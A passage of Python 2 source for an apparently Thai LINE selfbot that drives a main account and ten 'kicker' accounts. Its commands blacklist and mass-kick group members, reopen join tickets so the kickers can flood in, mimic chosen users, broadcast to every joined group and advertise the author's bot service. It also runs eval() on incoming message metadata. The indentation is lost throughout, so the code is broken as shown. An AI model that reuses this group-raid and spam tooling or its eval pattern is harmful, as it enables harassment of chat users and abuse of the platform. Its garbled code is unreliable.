msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
ki6.sendMessage(msg)
ki7.sendMessage(msg)
ki8.sendMessage(msg)
ki9.sendMessage(msg)
ki10.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
ki2.sendMessage(msg)
elif "youname " in msg.text.lower():
txt = msg.text.replace("youname ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Bl " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Done Banned")
print "[Command] Bannad"
except:
pass
#===========================================
#----------------------------------------------------------------------------
#------------------------------- UNBAN BY TAG -------------------------------
elif "Wl " in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Done Unbanned")
print "[Command] Unbannad"
except:
pass
# elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
# text = msg.text
# if text is not None:
# cl.sendText(msg.to,text)
# else:
# if msg.contentType == 7:
# msg.contentType = 7
# msg.text = None
# msg.contentMetadata = {
# "STKID": "6",
# "STKPKGID": "1",
# "STKVER": "100" }
# cl.sendMessage(msg)
# elif msg.contentType == 13:
# msg.contentType = 13
# msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
# cl.sendMessage(msg)
elif "Mimic:" in msg.text:
if msg.from_ in admin:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on\n\nเปิดการเลียนเเบบ")
else:
cl.sendText(msg.to,"Mimic already on\n\nเปิดการเลียนเเบบ")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off\n\nปิดการเลียนเเบบ")
else:
cl.sendText(msg.to,"Mimic already off\n\nปิดการเลียนเเบบ")
elif "add:" in cmd:
target0 = msg.text.replace("Mimic:add:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets\n\nเกิดผิดพลาด")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"โปรเเกรมเลียนเเบบทำงาน")
break
elif "del:" in cmd:
target0 = msg.text.replace("Mimic:del:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets\n\nเกิดข้อผิดพลาด")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"คุณลบการเลียนเเบบผู้ใช้นี้")
break
elif cmd == "list":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<List Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n-> " + cl.getContact(a).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal: " + total)
#----------------------------------------------------------------------------
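# botkill: intersects the group's member mids with the blacklist and has ki1 kick
# every match.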
elif msg.text.lower() in ["botkill"]:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
ki1.kickoutFromGroup(msg.to,[jj])
pass
elif msg.text.lower() in ["admins","mee","ผู้สร้าง"]:
msg.contentType = 13
adm = 'u65224f4e8812136f01b25275a54b5aef'
msg.contentMetadata = {'mid': adm}
cl.sendMessage(msg)
cl.sendText(msg.to,"Add Line http://line.me/ti/p/arif.mh")
cl.sendText(msg.to,"👆 สนใจ บอท ทักมาคุย กันได้นะครับ 👆")
#=========================================
elif msg.text in ["ของขวัญ","Gift","แจก"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["คิก1 แจก","Gift 1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '2'}
msg.text = None
ki1.sendMessage(msg)
elif msg.text in ["คิก2 แจก","Gift 2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["คิก3 แจก","Gift 3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Bot3 Gift","3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["คิก4 แจก","Gift 4"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["คิก5 แจก","Gift 5"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki5.sendMessage(msg)
elif msg.text in ["คิก6 แจก","Gift 6"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
ki6.sendMessage(msg)
elif msg.text in ["คิก7 แจก","Gift 7"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
ki7.sendMessage(msg)
elif msg.text in ["คิก8 แจก"," Gift 8"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '9'}
msg.text = None
ki8.sendMessage(msg)
elif msg.text in ["คิก9 แจก","Gift 9"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '10'}
msg.text = None
ki9.sendMessage(msg)
elif msg.text in ["คิก10 แจก","Gift 10"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '11'}
msg.text = None
ki10.sendMessage(msg)
#====================================================
#VPS STUFF - VPS NEEDED TO RUN THIS COMMAND :)
elif msg.text in ["vps","kernel","Vps"]:
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-svmo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel)
print "[Command]Kernel executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
print "[Error]Command denied - Admin permission required"
elif "ผู้สร้างกลุ่ม" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"old user")
elif 'ขอเพลง ' in msg.text:
try:
textToSearch = (msg.text).replace('ขอเพลง ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
cl.sendText(msg.to,'https://www.youtube.com' + results['href'])
except:
cl.sendText(msg.to,"Could not find it")
elif "#set" in msg.text:
cl.sendText(msg.to, "Let's see who lazy to type")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif "#read" in msg.text:
if msg.to in wait2['readPoint']:
    chiya = ""
    for rom in wait2["ROM"][msg.to].items():
        print rom
        chiya += rom[1] + "\n"
    cl.sendText(msg.to, "People who have read:%s\n%s\nRead point was set at:\n[%s]" % (wait2['readMember'][msg.to], chiya, wait2['setTime'][msg.to]))
else:
    cl.sendText(msg.to, "Read point not set.\nSend #set first, then #read will report who has read since then.")
elif msg.text in ["Myginfoid","ไอดีกลุ่ม ทั้งหมด"]:
gid = cl.getGroupIdsJoined()
g = ""
for i in gid:
g += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,g)
elif msg.text in ["P1 invite","P1 Invite"]:
wait["ainvite"] = True
ki1.sendText(msg.to,"Send Contact")
elif msg.text in ["P2 invite","P2 Invite"]:
wait["binvite"] = True
ki2.sendText(msg.to,"Send Contact")
#==================================================
elif "ประกาศ:" in msg.text:
bctxt = msg.text.replace("ประกาศ:", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif msg.text.lower() == 'bann':
blockedlist = cl.getBlockedContactIds()
cl.sendText(msg.to, "Please wait...")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif "#หำ1:" in msg.text:
string = msg.text.replace("#หำ1:","")
if len(string.decode('utf-8')) <= 20:
profile = ki1.getProfile()
profile.displayName = string
ki1.updateProfile(profile)
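# Ticket join flow used by the kicker commands below: temporarily allow
# join-by-ticket, reissue the group ticket, let each kicker account join with it,
# then lock the group again.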
elif msg.text in ["คิกมา","มาหำ","#Kicker","#kicker","Kicker","kicker","•••"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.sendText(msg.to,"[SELF BOT\ทBy:☬ARIFISTIFIK☬ ]")
ki2.sendText(msg.to,"[Do not think will try.]")
ki3.sendText(msg.to,"[ By: ☬ARIFISTIFIK☬ ]")
ki1.sendText(msg.to,"Hello " + str(ginfo.name) + "\n[By:☬ARIFISTIFIK☬ ]")
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["คิก"]:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.0)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
elif msg.text in ["คิกออก","บอทออก","Bye","#bye"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki1.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki1.leaveGroup(msg.to)
ki2.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki2.leaveGroup(msg.to)
ki3.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki3.leaveGroup(msg.to)
ki4.sendText(msg.to,"Bye~Bye\nลาก่อย" + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki4.leaveGroup(msg.to)
ki5.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki5.leaveGroup(msg.to)
ki6.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]]")
ki6.leaveGroup(msg.to)
ki7.sendText(msg.to,"Bye~Bye\nลาก่อย ??" + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki7.leaveGroup(msg.to)
ki8.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki8.leaveGroup(msg.to)
ki9.sendText(msg.to,"Bye~Bye\nลาก่อย " + str(ginfo.name) + "\n[By.☬ARIFISTIFIK☬]")
ki9.leaveGroup(msg.to)
ki10.sendText(msg.to,"Bye~Bye\ลาก่อย " + str(ginfo.name) + "\n[By ☬ARIFISTIFIK☬]")
ki10.leaveGroup(msg.to)
except:
pass
elif msg.text.lower() == '#byeall':
    if msg.toType == 2:
        try:
            for bot in [ki1, ki2, ki3, ki4, ki5, ki6, ki7, ki8, ki9, ki10]:
                bot.leaveGroup(msg.to)
        except:
            pass
elif "#v10" in msg.text:
cl.sendText(msg.to,"""[SELF BOT]\n[By:☬ARIFISTIFIK☬]")
คำสั่งบอท siri
คำนี้เป็นการล็อกห้องสั่งแล้วทุกคนจะทำอะไรไม่ได้นอกจากเจ้าของห้องทำได้คนเดียวเช่น•เปิดลิงค์•เชิญเพื่อน•เปลี่ยนรูปกลุ่ม•เปลี่ยนชื่อกลุ่มไรแบบนี้• บอทจะไม่เตะเเอทมินทุกกรณี
มีตั้งเเต่ชุดบอท 12-37 บอท
ชุดล๊อกห้อง
ล๊อกกันรันสติ๊กเกอร์
Set:StampLimitation:on
ล๊อกชื่อกลุ่ม
Set:changenamelock:on
ล๊อกการเชิญของสมาชิก
Set:blockinvite:on
ล๊อกแอทมินกลุ่ม
Set:ownerlock:on
ล๊อกรูปกลุ่ม
Set:iconlock:on
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:changeowner
เปลี่ยนเจ้าของห้องสั่งแล้วส่งคอลแทคคนที่จะเป็นเจ้าของห้องคนต่อไปลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:addblacklist
บัญชีดำแบ็คลิสคนไม่ให้เข้ากลุ่มสั่งแล้วส่งคอลแทคคนที่เราจะแบ็คลิสลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:addwhitelist
บัญชีขาวแก้ดำสั่งแล้วส่งคอลแทคคนที่เราจะแก้แบ๊คลิสลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:blockinvite:off ปลดล็อกการเชิญ
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:blockinvite:on ล็อกการเชิญ
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:inviteurl เปิดลิงค์
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:DenyURLInvite ปิดลิงค์
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:cancelinvite ยกเลิกค้างเชิญสั่ง2ครั้ง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:groupcreator เช็คเจ้าของบ้านตัวจริง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Siri:extracreator เช็คเจ้าของบ้านคนสำรอง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
set:changeextraowner
เพิ่มเจ้าของบ้านคนที2หรือเรียกคนสำรองสั่งแล้วส่งคอลแทคคนที่จะเป็นคนสำรองลงในกลุ่ม
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
Set:turncreator
สลับให้เจ้าของบ้านคนที่2เป็นตัวจริง
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
ดูคนอ่าน
สั่งตั้งค่าก่อนแล้วค่อยสั่งอ่านคน
Setlastpoint ตั้งค่า
Viewlastseen สั่งอ่าน
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
สนใจติดต่อที่
By: ☬ARIFISTIFIK☬
LINE ID 4545272
http://line.me/ti/p/arif.mh
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
""")
#==================================================
elif msg.text in ["Invite"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"โปรดส่ง คท ด้วย")
elif msg.text in ["เชิญ"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"โปรดส่ง คท ด้วย")
elif msg.text in ["invite on"]:
if msg.from_ in admin:
wait["winvite"] = False
cl.sendText(msg.to,"ปิดการเชิญ แล้ว.")
elif msg.text in ["Bot1 invite contact","1เชิญ"]:
if msg.from_ in admin:
wait["ainvite"] = True
ki1.sendText(msg.to,"send contact")
elif msg.text in ["Bot2 invite contact","2เชิญ"]:
if msg.from_ in admin:
wait["binvite"] = True
ki2.sendText(msg.to,"send contact")
elif ("Ktc " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
cl.inviteIntoGroup(msg.to,[target])
cl.cancelGroupInvitation(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif '123zzz' in msg.text.lower():
key = msg.text[-33:]
cl.findAndAddContactsByMid(key)
cl.inviteIntoGroup(msg.to, [key])
contact = cl.getContact(key)
elif msg.text in ["ยกเลิก"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["บอทยกเลิก"]:
klist = [ki1,ki2,ki3,ki4,ki5,ki6,ki7]
kicker = random.choice(klist)
if msg.toType == 2:
    G = kicker.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
kicker.sendText(msg.to,"No one is inviting")
else:
kicker.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
kicker.sendText(msg.to,"Can not be used outside the group")
else:
kicker.sendText(msg.to,"Not for use less than group")
elif msg.text in ["#Link on"]:
uye = random.choice(KAC)
if msg.toType == 2:
    X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
elif msg.text in ["เปิดลิ้ง"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"อนุญาติ ให้มีการเชิญ\nด้วยลิ้งแล้ว👌")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["ปิดลิ้ง"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปิดการเชิญ\nด้วยลิ้งแล้ว👌")
else:
cl.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text.lower() == 'ginfo':
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[Nama]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nAnggota:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
elif msg.text in ["!Glist","Myginfo"]:
gs = cl.getGroupIdsJoined()
L = "☫『 Groups List 』☫\n"
for i in gs:
L += "[⭐] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif msg.text in ["Selfbot"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
cl.sendText(msg.to,"[SELFBOT\nBy:☬ARIFISTIFIK☬]")
elif "ไอดี" == msg.text:
key = msg.to
cl.sendText(msg.to, key)
elif ("Hack " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
elif "Mid:" in msg.text:
mmid = msg.text.replace("Mid:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
# elif "Phet Keyy" in msg.text:
# cl.sendText(msg.to,""" [{PHET HACK BOT}] \n\n key Only Kicker #\n\n[Kb1 in]\n[1Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Pb1 Gift]\n[Pb1 bye]\n\n
#❦❧〖฿❂Ŧ〗☞ᵀËÄM ທஇລ❂ق B❂T✓
#❦❧ ᵀËÄM ℓℓπ้ी૪ B❂T ✓
#❦❧ ᵀËÄM ທஇລ❂قB❂T ✓
#☠Ҝŋ β☢ȶȶ ƿℓαÿєᴿ☠
#✍ Ŧ€₳M ж Ħ₳ʗҜ฿❂Ŧ ✈
#Ŧ€₳M ✍ ທஇລ❂قীள้௭ิњ ✈
#☢Ŧ€₳M≈ನန้ণএ≈฿❂Ŧ☢
#・⋆ ざঝণのঝ ⋆ ・
#♤ のю४ণধபӘທ ♤
#🇹?? ฿ΘŧŧĽÎη℮Ŧђάίłάήđ 🇹🇭
#[By.🐯 हईທຮຮๅજईह 🐯]
#[By.β•`BF.บั้ม•`]
#[By.Gυ Tєʌм HʌcκBoт]
#[By.❦〖Ᵽɧëȶ〗☞ᵀËÄM ທஇລ❂ق B❂T✓]
#""")
elif msg.text.lower() == 'ยกเลิก1':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
elif msg.text.lower() == 'บอทยกเลิก1':
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki1.cancelGroupInvitation(msg.to,[_mid])
ki1.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
cl.sendText(msg.to,"I pretended to cancel and canceled(๑و•̀ω•́)و")
elif "คท @" in msg.text:
msg.contentType = 13
_name = msg.text.replace("คท @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentMetadata = {'mid': g.mid}
cl.sendMessage(msg)
else:
pass
elif "#cb" in msg.text:
nk0 = msg.text.replace("#cb","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"😏")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"😏")
except:
cl.sendText(msg.to,"😏")
elif "แบนหมด" in msg.text:
nk0 = msg.text.replace("แบนหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "ลบแบน ทั้งหมด" in msg.text:
nk0 = msg.text.replace("ลบแบน ทั้งหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif msg.text == "กลุ่ม":
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "ไม่พบผู้สร้างกลุ่ม"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "[ปิด]"
else:
u = "[เปิด]"
cl.sendText(msg.to,"[ชื่อของกลุ่ม]:\n" + str(ginfo.name) + "\n[Gid]:\n" + msg.to + "\n[ผู้สร้างกลุ่ม:]\n" + gCreator + "\n[ลิ้งค์รูปกลุ่ม]:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n[จำนวนสมาชิก]:" + str(len(ginfo.members)) + "คน\n[จำนวนค้างเชิญ]:" + sinvitee + "คน\n[สถานะลิ้งค์]:" + u + "URL\n[By: ☬ARIFISTIFIK☬]")
else:
cl.sendText(msg.to,"Nama Gourp:\n" + str(ginfo.name) + "\nGid:\n" + msg.to + "\nCreator:\n" + gCreator + "\nProfile:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Bot1@@" in msg.text:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
